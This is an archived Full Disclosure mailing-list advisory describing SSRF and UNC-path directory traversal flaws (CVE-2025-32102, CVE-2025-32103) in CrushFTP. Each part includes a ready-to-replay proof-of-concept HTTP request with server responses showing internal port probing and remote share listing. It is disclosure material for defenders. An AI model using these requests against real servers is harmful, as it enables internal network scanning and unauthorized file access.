| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CANoQWWd8+3oVTJgkCXt-cxMy4y-1sCesAyVC49ZU67D_tyTDdg@mail.gmail.com>
Date: Fri, 4 Apr 2025 08:01:00 +0200
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2025-32102,
CVE-2025-32103] SSRF and Directory Traversal in CrushFTP 10.7.1 and
11.1.0 (as well as legacy 9.x)
<!--
# Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and
11.1.0 (as well as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32102
# Vulnerability: CWE-918
# Category: webapps
1. Description
CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF
via the host and port parameters in a command=telnetSocket request to the
/WebInterface/function/ URI.
2. Proof of Concept
The application has a form to establish telnet connections. The parameters
where the target is entered are host and port, for example,
"host=127.0.0.1&port=8080". It can be used to scan remote ports, as it
receives the string "Connected" if it connects successfully, whereas it
receives "Connection%20refused" if it does not connect
POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090
command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq
Open port: 8080
<commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)
</data></response></commandResult>
Close port: 8888
<commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt:
(/127.0.0.1)</error>Error:java.lang.NullPointerException
</response></commandResult>
3. Solution:
Update to last version this product.
-->
<!--
# Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well
as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32103
# Vulnerability: CWE-40
# Category: webapps
1. Description
CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows
directory traversal via the /WebInterface/function/ URI to read files
accessible by SMB at UNC share pathnames, bypassing SecurityManager
restrictions.
2. Proof of Concept
The application's logic does not account for the fact that, when listing
directories or files, the path can be modified to allow UNC paths from
another machine on the network or on the internet instead of local files.
An attacker injects a UNC path (\server\resource) instead of a local path
(such as C:/PATH) and gains access to remote directories or files. This is
more specific than typical Path Traversal and occurs when network paths are
not properly filtered or restricted.
POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090
command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq
<?xml version="1.0" encoding="UTF-8"?>
<listingInfo type="properties">
<path>////vboxsrv/demo/</path>
<privs>(read)(view)</privs>
<listing>l = new Array();
lp = {};
lp.name="directorio1";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio1";
lp.privs="(read)(view)";
lp.size="0";
lp.modified="0";
lp.created="null";
l[l.length] = lp;
lp = {};
lp.name="directorio2";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio2";
...
The vulnerable parameter is path, where the local path can be changed to a
remote path, thereby displaying remote directories. This could later be
used for potential file downloads within those directories, just as it
would if they were local.
3. Solution:
Update to last version this product.
-->
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists